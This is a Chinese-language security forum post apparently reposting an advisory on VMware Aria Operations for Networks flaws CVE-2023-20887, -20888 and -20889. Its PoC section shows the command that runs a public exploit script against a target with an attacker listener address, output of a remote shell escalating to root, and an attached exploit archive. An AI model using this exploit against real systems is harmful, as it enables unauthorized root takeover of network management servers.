请选择 进入手机版 | 继续访问电脑版
查看: 14732|回复: 0

VMware Aria Operations for Networks命令注入漏洞

[复制链接]
  • TA的每日心情
    擦汗
    前天 12:29
  • 签到天数: 1559 天

    [LV.Master]伴坛终老

    发表于 2023-6-15 09:28:02 | 显示全部楼层 |阅读模式
    poc.gif
    VMware Aria Operations for Networks (以前称为vRealize Network Insight,vRNI)是一款网络可视性和分析工具,可以帮助管理员优化网络性能或管理和扩展各种VMware和Kubernetes部署。

    6月8日,启明星辰VSRC监测到VMware发布安全公告,修复了Aria Operations Networks 6.x中的一个命令注入漏洞(CVE-2023-20887),该漏洞的CVSSv3评分为9.8,对 VMware Aria Operations for Networks 具有网络访问权限的威胁者可以通过执行命令注入攻击,从而导致远程代码执行。

    此外,VMware Aria Operations for Networks 6.x中还修复了一个反序列化漏洞(CVE-2023-20888,CVSSv3评分9.1),对Aria Operations for Networks 具有网络访问权限的经过身份验证的恶意用户可以执行反序列化攻击,从而导致远程代码执行;以及修复了另一个信息泄露漏洞(CVE-2023-20889,CVSSv3评分8.8),对Aria Operations for Networks具有网络访问权限的威胁者可以通过执行命令注入攻击,导致信息泄露。

    影响范围
    VMware Aria Operations Networks版本:6.x

    poc:
    [AppleScript] 纯文本查看 复制代码
    python CVE-2023-20887.py --url [url]https://192.168.116.100[/url] --attacker 192.168.116.1:1337
    VMWare Aria Operations for Networks (vRealize Network Insight) pre-authenticated RCE || Sina Kheirkhah (@SinSinology) of Summoning Team (@SummoningTeam)
    (*) Starting handler
    (+) Received connection from 192.168.116.100
    (+) pop thy shell! (it's ready)
    sudo bash
    id
    uid=0(root) gid=0(root) groups=0(root)
    hostname
    vrni-platform-release


    CVE-2023-20887-main.zip (58.96 KB, 下载次数: 2)
    回复

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    指导单位

    江苏省公安厅

    江苏省通信管理局

    浙江省台州刑侦支队

    DEFCON GROUP 86025

    旗下站点

    邮箱系统

    应急响应中心

    红盟安全

    联系我们

    官方QQ群:112851260

    官方邮箱:security#ihonker.org(#改成@)

    官方核心成员

    Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

    GMT+8, 2024-4-17 15:00 , Processed in 0.049674 second(s), 16 queries , Gzip On, MemCache On.

    Powered by ihonker.com

    Copyright © 2015-现在.

  • 返回顶部